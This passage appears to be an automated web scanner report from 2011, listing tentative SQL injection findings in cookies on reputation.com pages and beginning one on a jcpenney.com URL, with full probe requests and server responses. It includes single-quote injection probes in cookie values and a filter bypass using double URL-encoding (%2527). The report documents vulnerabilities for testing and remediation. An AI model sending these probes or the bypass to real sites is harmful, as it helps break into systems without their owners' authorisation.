Cookie: PHPSESSID=cr9mtt4r59r253pvqk5sko5292; uuid=4dace99e24a7a; retargeter=generic; country=USA%2C173.193.214.243; lang=en; region=USA''; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; ysm_CK=ysm_PV:1&ysm_SN:1303177680456&ysm_LD:0; _bizo_cksm_crc32=CC9F083; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=832B265F669E4F3E; __utmz=1.1303177683.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.271525511.1303177683.1303177683.1303177683.1; __utmc=1; __utmb=1.1.10.1303177683; _bizo_np_stats=753%3D591%2C; __ar_v4=; abg_products/default6_d=products%2Fdefault6_e; shoppingCart=cr9mtt4r59r253pvqk5sko5292; repdef_ref_code=RCPT2

Response 2

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 01:51:48 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: shoppingCart=cr9mtt4r59r253pvqk5sko5292; expires=Sat, 19-Apr-2014 01:51:48 GMT; path=/; domain=www.reputation.com
Set-Cookie: repdef_ref_code=RCPT2; expires=Thu, 19-May-2011 01:51:48 GMT; path=/
Vary: Accept-Encoding
Content-Length: 122639
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<!-- Elapsed Time: 0.2087011337280
...[SNIP]...

1.23. http://www.reputation.com/services/panelrenderer.php [region cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www.reputation.com
Path:   /services/panelrenderer.php

Issue detail

The region cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the region cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /services/panelrenderer.php?method=addBundle&planId=1862&entityId=0&panel=secure%2Fregistration%2Fupdatecart&panelRefreshURL=secure%2Fregistration%2Fcart2_noMonthly&noUpsellCart2=false HTTP/1.1
Host: www.reputation.com
Proxy-Connection: keep-alive
Referer: http://www.reputation.com/itemAdded?planAdded=2800
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cr9mtt4r59r253pvqk5sko5292; retargeter=generic; country=USA%2C173.193.214.243; lang=en; region=USA'; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; __utmz=1.1303177683.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); abg_products/default6_d=products%2Fdefault6_e; abglink_repdef_table_test=repdef_table; abg_products/repdef_table_a_0308=products%2Frepdef_table_b_0308; abglink_repdef_traffic_routing_test=default; abg_products/repdef_traffic_routing_old=products%2Frepdef_traffic_routing_old; __utmv=; uuid=4dacead2acca8; repdef_ref_code=RCPT2; shoppingCart=cr9mtt4r59r253pvqk5sko5292; ysm_CK=ysm_PV:2&ysm_SN:1303177680456&ysm_LD:0; _bizo_cksm_crc32=31AF1EF9; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=832B265F669E4F3E; _bizo_np_stats=753%3D47%2C; __ar_v4=ADLLSWOYQRDC7DYKK7QWPE%3A20110419%3A4%7C7QKKZNUYGZBKBKY3PBNPYI%3A20110419%3A4%7CFWN5JUPQAJE4XJIM4JEU2F%3A20110419%3A4; __utma=1.271525511.1303177683.1303177683.1303177683.1; __utmc=1; __utmb=1.39.4.1303178052699

Response 1

HTTP/1.0 500 Internal Server Error
Date: Tue, 19 Apr 2011 02:07:49 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /services/panelrenderer.php?method=addBundle&planId=1862&entityId=0&panel=secure%2Fregistration%2Fupdatecart&panelRefreshURL=secure%2Fregistration%2Fcart2_noMonthly&noUpsellCart2=false HTTP/1.1
Host: www.reputation.com
Proxy-Connection: keep-alive
Referer: http://www.reputation.com/itemAdded?planAdded=2800
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Content-Type: application/x-www-form-urlencoded
Accept: text/html, */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cr9mtt4r59r253pvqk5sko5292; retargeter=generic; country=USA%2C173.193.214.243; lang=en; region=USA''; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; __utmz=1.1303177683.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); abg_products/default6_d=products%2Fdefault6_e; abglink_repdef_table_test=repdef_table; abg_products/repdef_table_a_0308=products%2Frepdef_table_b_0308; abglink_repdef_traffic_routing_test=default; abg_products/repdef_traffic_routing_old=products%2Frepdef_traffic_routing_old; __utmv=; uuid=4dacead2acca8; repdef_ref_code=RCPT2; shoppingCart=cr9mtt4r59r253pvqk5sko5292; ysm_CK=ysm_PV:2&ysm_SN:1303177680456&ysm_LD:0; _bizo_cksm_crc32=31AF1EF9; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=832B265F669E4F3E; _bizo_np_stats=753%3D47%2C; __ar_v4=ADLLSWOYQRDC7DYKK7QWPE%3A20110419%3A4%7C7QKKZNUYGZBKBKY3PBNPYI%3A20110419%3A4%7CFWN5JUPQAJE4XJIM4JEU2F%3A20110419%3A4; __utma=1.271525511.1303177683.1303177683.1303177683.1; __utmc=1; __utmb=1.39.4.1303178052699

Response 2

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 02:07:50 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: shoppingCart=qua93ksa55ud9ln7chqb63fue4; expires=Sat, 19-Apr-2014 02:07:50 GMT; path=/; domain=www.reputation.com
Vary: Accept-Encoding
Content-Length: 113400
Content-Type: text/html; charset=UTF-8

<input type="hidden" id="_isCartEmpty" value=""/>
<div id="purchaseTop" class="left">
<div id="shoppingCartTable">

<div class="entityNameBar"><h2 class
...[SNIP]...

1.24. https://www.reputation.com/products [region cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.reputation.com
Path:   /products

Issue detail

The region cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the region cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /products HTTP/1.1
Host: www.reputation.com
Connection: keep-alive
Referer: http://www.reputation.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cr9mtt4r59r253pvqk5sko5292; uuid=4dace99e24a7a; repdef_ref_code=RCPT2; retargeter=generic; country=USA%2C173.193.214.243; lang=en; region=USA'; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; ysm_CK=ysm_PV:1&ysm_SN:1303177680456&ysm_LD:0; _bizo_cksm_crc32=CC9F083; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=832B265F669E4F3E; __utmz=1.1303177683.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.271525511.1303177683.1303177683.1303177683.1; __utmc=1; __utmb=1.1.10.1303177683; _bizo_np_stats=753%3D591%2C; __ar_v4=; shoppingCart=cr9mtt4r59r253pvqk5sko5292; abg_products/default6_d=products%2Fdefault6_e

Response 1

HTTP/1.0 500 Internal Server Error
Date: Tue, 19 Apr 2011 01:51:50 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /products HTTP/1.1
Host: www.reputation.com
Connection: keep-alive
Referer: http://www.reputation.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cr9mtt4r59r253pvqk5sko5292; uuid=4dace99e24a7a; repdef_ref_code=RCPT2; retargeter=generic; country=USA%2C173.193.214.243; lang=en; region=USA''; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; ysm_CK=ysm_PV:1&ysm_SN:1303177680456&ysm_LD:0; _bizo_cksm_crc32=CC9F083; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=832B265F669E4F3E; __utmz=1.1303177683.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.271525511.1303177683.1303177683.1303177683.1; __utmc=1; __utmb=1.1.10.1303177683; _bizo_np_stats=753%3D591%2C; __ar_v4=; shoppingCart=cr9mtt4r59r253pvqk5sko5292; abg_products/default6_d=products%2Fdefault6_e

Response 2

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 01:51:50 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: shoppingCart=cr9mtt4r59r253pvqk5sko5292; expires=Sat, 19-Apr-2014 01:51:50 GMT; path=/; domain=www.reputation.com
Set-Cookie: repdef_ref_code=RCPT2; expires=Thu, 19-May-2011 01:51:50 GMT; path=/
Vary: Accept-Encoding
Content-Length: 145704
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<!-- Elapsed Time: 0.1298601627349
...[SNIP]...

1.25. https://www.reputation.com/secure/forgotPassword [region cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.reputation.com
Path:   /secure/forgotPassword

Issue detail

The region cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the region cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /secure/forgotPassword HTTP/1.1
Host: www.reputation.com
Connection: keep-alive
Referer: https://www.reputation.com/secure/login
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cr9mtt4r59r253pvqk5sko5292; uuid=4dace99e24a7a; retargeter=generic; country=USA%2C173.193.214.243; lang=en; region=USA'; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; ysm_CK=ysm_PV:1&ysm_SN:1303177680456&ysm_LD:0; _bizo_cksm_crc32=CC9F083; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=832B265F669E4F3E; __utmz=1.1303177683.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.271525511.1303177683.1303177683.1303177683.1; __utmc=1; __utmb=1.1.10.1303177683; _bizo_np_stats=753%3D591%2C; __ar_v4=; abg_products/default6_d=products%2Fdefault6_e; shoppingCart=cr9mtt4r59r253pvqk5sko5292; repdef_ref_code=RCPT2

Response 1

HTTP/1.0 500 Internal Server Error
Date: Tue, 19 Apr 2011 01:51:13 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /secure/forgotPassword HTTP/1.1
Host: www.reputation.com
Connection: keep-alive
Referer: https://www.reputation.com/secure/login
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cr9mtt4r59r253pvqk5sko5292; uuid=4dace99e24a7a; retargeter=generic; country=USA%2C173.193.214.243; lang=en; region=USA''; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; ysm_CK=ysm_PV:1&ysm_SN:1303177680456&ysm_LD:0; _bizo_cksm_crc32=CC9F083; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=832B265F669E4F3E; __utmz=1.1303177683.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.271525511.1303177683.1303177683.1303177683.1; __utmc=1; __utmb=1.1.10.1303177683; _bizo_np_stats=753%3D591%2C; __ar_v4=; abg_products/default6_d=products%2Fdefault6_e; shoppingCart=cr9mtt4r59r253pvqk5sko5292; repdef_ref_code=RCPT2

Response 2

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 01:51:13 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 23649
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...

1.26. https://www.reputation.com/secure/login [region cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.reputation.com
Path:   /secure/login

Issue detail

The region cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the region cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /secure/login HTTP/1.1
Host: www.reputation.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cr9mtt4r59r253pvqk5sko5292; uuid=4dace99e24a7a; retargeter=generic; country=USA%2C173.193.214.243; lang=en; region=USA'; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; ysm_CK=ysm_PV:1&ysm_SN:1303177680456&ysm_LD:0; _bizo_cksm_crc32=CC9F083; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=832B265F669E4F3E; __utmz=1.1303177683.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.271525511.1303177683.1303177683.1303177683.1; __utmc=1; __utmb=1.1.10.1303177683; _bizo_np_stats=753%3D591%2C; __ar_v4=; abg_products/default6_d=products%2Fdefault6_e; shoppingCart=cr9mtt4r59r253pvqk5sko5292; repdef_ref_code=RCPT2

Response 1

HTTP/1.0 500 Internal Server Error
Date: Tue, 19 Apr 2011 01:50:23 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /secure/login HTTP/1.1
Host: www.reputation.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cr9mtt4r59r253pvqk5sko5292; uuid=4dace99e24a7a; retargeter=generic; country=USA%2C173.193.214.243; lang=en; region=USA''; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; ysm_CK=ysm_PV:1&ysm_SN:1303177680456&ysm_LD:0; _bizo_cksm_crc32=CC9F083; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=832B265F669E4F3E; __utmz=1.1303177683.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.271525511.1303177683.1303177683.1303177683.1; __utmc=1; __utmb=1.1.10.1303177683; _bizo_np_stats=753%3D591%2C; __ar_v4=; abg_products/default6_d=products%2Fdefault6_e; shoppingCart=cr9mtt4r59r253pvqk5sko5292; repdef_ref_code=RCPT2

Response 2

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 01:50:24 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 26434
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...

1.27. https://www.reputation.com/secure/login [repdef_ref_code cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.reputation.com
Path:   /secure/login

Issue detail

The repdef_ref_code cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the repdef_ref_code cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /secure/login HTTP/1.1
Host: www.reputation.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cr9mtt4r59r253pvqk5sko5292; uuid=4dace99e24a7a; retargeter=generic; country=USA%2C173.193.214.243; lang=en; region=USA; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; ysm_CK=ysm_PV:1&ysm_SN:1303177680456&ysm_LD:0; _bizo_cksm_crc32=CC9F083; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=832B265F669E4F3E; __utmz=1.1303177683.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.271525511.1303177683.1303177683.1303177683.1; __utmc=1; __utmb=1.1.10.1303177683; _bizo_np_stats=753%3D591%2C; __ar_v4=; abg_products/default6_d=products%2Fdefault6_e; shoppingCart=cr9mtt4r59r253pvqk5sko5292; repdef_ref_code=RCPT2'

Response 1

HTTP/1.0 500 Internal Server Error
Date: Tue, 19 Apr 2011 01:53:25 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /secure/login HTTP/1.1
Host: www.reputation.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cr9mtt4r59r253pvqk5sko5292; uuid=4dace99e24a7a; retargeter=generic; country=USA%2C173.193.214.243; lang=en; region=USA; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; ysm_CK=ysm_PV:1&ysm_SN:1303177680456&ysm_LD:0; _bizo_cksm_crc32=CC9F083; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=832B265F669E4F3E; __utmz=1.1303177683.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.271525511.1303177683.1303177683.1303177683.1; __utmc=1; __utmb=1.1.10.1303177683; _bizo_np_stats=753%3D591%2C; __ar_v4=; abg_products/default6_d=products%2Fdefault6_e; shoppingCart=cr9mtt4r59r253pvqk5sko5292; repdef_ref_code=RCPT2''

Response 2

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 01:53:26 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 26434
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equi
...[SNIP]...

1.28. https://www.reputation.com/secure/reg1 [region cookie]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   https://www.reputation.com
Path:   /secure/reg1

Issue detail

The region cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the region cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

Request 1

GET /secure/reg1 HTTP/1.1
Host: www.reputation.com
Connection: keep-alive
Referer: http://www.reputation.com/itemAdded?bundleAdded=1891
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cr9mtt4r59r253pvqk5sko5292; retargeter=generic; country=USA%2C173.193.214.243; lang=en; region=USA'; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; __utmz=1.1303177683.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); abg_products/default6_d=products%2Fdefault6_e; abglink_repdef_table_test=repdef_table; abg_products/repdef_table_a_0308=products%2Frepdef_table_b_0308; abglink_repdef_traffic_routing_test=default; abg_products/repdef_traffic_routing_old=products%2Frepdef_traffic_routing_old; __utmv=; repdef_ref_code=RCPT2; uuid=4daceb8bb1719; ysm_CK=ysm_PV:2&ysm_SN:1303177680456&ysm_LD:0; _bizo_cksm_crc32=3243BE4E; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=832B265F669E4F3E; _bizo_np_stats=753%3D131%2C; __ar_v4=FWN5JUPQAJE4XJIM4JEU2F%3A20110419%3A6%7C7QKKZNUYGZBKBKY3PBNPYI%3A20110419%3A6%7CADLLSWOYQRDC7DYKK7QWPE%3A20110419%3A6; __utma=1.271525511.1303177683.1303177683.1303177683.1; __utmc=1; __utmb=1.50.9.1303178295497; shoppingCart=cr9mtt4r59r253pvqk5sko5292

Response 1

HTTP/1.0 500 Internal Server Error
Date: Tue, 19 Apr 2011 02:07:18 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

Request 2

GET /secure/reg1 HTTP/1.1
Host: www.reputation.com
Connection: keep-alive
Referer: http://www.reputation.com/itemAdded?bundleAdded=1891
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=cr9mtt4r59r253pvqk5sko5292; retargeter=generic; country=USA%2C173.193.214.243; lang=en; region=USA''; abg_widgets/rdlite_widget_original=widgets%2Frec_widget; __utmz=1.1303177683.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); abg_products/default6_d=products%2Fdefault6_e; abglink_repdef_table_test=repdef_table; abg_products/repdef_table_a_0308=products%2Frepdef_table_b_0308; abglink_repdef_traffic_routing_test=default; abg_products/repdef_traffic_routing_old=products%2Frepdef_traffic_routing_old; __utmv=; repdef_ref_code=RCPT2; uuid=4daceb8bb1719; ysm_CK=ysm_PV:2&ysm_SN:1303177680456&ysm_LD:0; _bizo_cksm_crc32=3243BE4E; _bizo_bzid=55f5fe79-12b4-4f78-9976-61924d438e85; _bizo_cksm=832B265F669E4F3E; _bizo_np_stats=753%3D131%2C; __ar_v4=FWN5JUPQAJE4XJIM4JEU2F%3A20110419%3A6%7C7QKKZNUYGZBKBKY3PBNPYI%3A20110419%3A6%7CADLLSWOYQRDC7DYKK7QWPE%3A20110419%3A6; __utma=1.271525511.1303177683.1303177683.1303177683.1; __utmc=1; __utmb=1.50.9.1303178295497; shoppingCart=cr9mtt4r59r253pvqk5sko5292

Response 2

HTTP/1.1 200 OK
Date: Tue, 19 Apr 2011 02:07:18 GMT
Server: Apache
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Set-Cookie: shoppingCart=qua93ksa55ud9ln7chqb63fue4; expires=Sat, 19-Apr-2014 02:07:18 GMT; path=/; domain=www.reputation.com
Vary: Accept-Encoding
Content-Length: 159743
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=UTF-8

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Conte
...[SNIP]...

1.29. http://www4.jcpenney.com/jcp/JCPRoute.aspx [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Tentative
Host:   http://www4.jcpenney.com
Path:   /jcp/JCPRoute.aspx

Issue detail

The REST URL parameter 1 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 1, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.

The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request 1

GET /jcp%2527/JCPRoute.aspx?Target=PREPRINT_HOME&cmResetCat=True&CmCatId=70676&mscssid=61594d316179a4f548f577dab343a8538xMnVNoVza3oxMnVNoVza3W200B0A67BD19FE0DDB3BC3FE02796C1DAD4B1105704 HTTP/1.1
Host: www4.jcpenney.com
